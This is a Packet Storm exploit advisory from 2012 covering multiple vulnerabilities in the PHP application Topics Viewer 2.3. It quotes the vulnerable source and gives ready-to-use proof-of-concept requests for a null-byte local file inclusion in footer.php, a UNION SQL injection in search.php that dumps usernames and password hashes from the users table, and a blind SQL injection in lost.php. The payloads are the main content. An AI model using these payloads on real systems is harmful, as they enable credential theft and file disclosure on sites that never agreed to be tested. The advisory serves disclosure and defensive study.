Topics Viewer 2.3 Local File Inclusion / SQL Injection

2012-05-28T00:00:00
ID PACKETSTORM:113083
Type packetstorm
Reporter n4ss1m
Modified 2012-05-28T00:00:00

Description

                                        
                                            `################################################################################################  
# Exploit Title: Topics viewer v 2.3 Multiple Vulnerabilities  
# Software Link: http://nilehoster.com/default/topicsviewer  
  
# Author: n4ss1m  
# Date: 19-05-2012  
# Tested on: win/linux  
# Home : www.Sec4ever.com <http://www.sec4ever.com/>  
  
  
################################################################################################  
  
# Local File Inclusion ( footer.php )  
  
<?php  
  
// footer file //  
  
echo "<br>";  
@include ("themes/$site_theme/templates/footer_head.html"); # <--  
$site_theme without value  
echo "<br>";  
  
...etc...  
?>  
  
# PoC :  
http://domain.tld/footer.php?site_theme=../robots.txt%00  
  
  
  
# Note : register_globals must be ON  
  
################################################################################################  
  
# SQL injection ( search.php )  
  
<?  
...  
$q = strip_tags (trim(str_replace('"','',$_GET['q']))); # <----  
variable $q equal $_GET['q']  
...  
if(isset ($q) && !empty ($q) && $q != " ")  
{  
$q = strip_tags(trim($_GET['q']));  
$sql_s1 = "SELECT * FROM topics where t_title like '%$q%' OR t_desc  
like '%$q%'"; # $q :)  
$res_s1 = @mysql_query($sql_s1);  
...  
?>  
  
# PoC :  
http://domain.tld/search.php?q=junk'+union+select+1,group_concat(u_name,0x3a,u_mpass),3,4,5,6,7,8,9,10,11,12+from+users+where+u_id=1%23&search=true  
  
  
  
# magic_quotes_gpc must be OFF  
  
################################################################################################  
  
# Blind SQL injection ( lost.php )  
  
<?  
....  
if(!empty($_POST[uname]) && !empty($_POST[reg_mail]) &&  
!empty($_POST[to_mail]) && strstr($_POST[to_mail],".") &&  
strstr($_POST[to_mail],"@")  
&& strstr($_POST[reg_mail],".") && strstr ($_POST[reg_mail],"@") ){  
$s_pass = md5($_POST[s_pass]);  
$sql_ver = "SELECT * FROM users where u_name = '$_POST[uname]' AND  
u_email = '$_POST[reg_mail]'"; # <-- $_POST[uname] not secure we can  
use it to inject mysql query  
$res_ver = @mysql_query ($sql_ver);  
$result_ver = @mysql_numrows($res_ver);  
$user = @mysql_fetch_assoc($res_ver);  
....  
?>  
  
# PoC :  
  
POST : uname=junk'[SQL  
injection]%23®_mail=email@email.tld&to_mail=email2@email.tld&B1=true  
http://domain.tld/lost.php  
  
  
  
# magic_quotes_gpc must be OFF  
  
################################################################################################  
# References : http://www.exploit4arab.com/exploits/69  
  
  
# Vendor reported on : 19-05-2012  
# published on : 27-05-2012  
################################################################################################  
`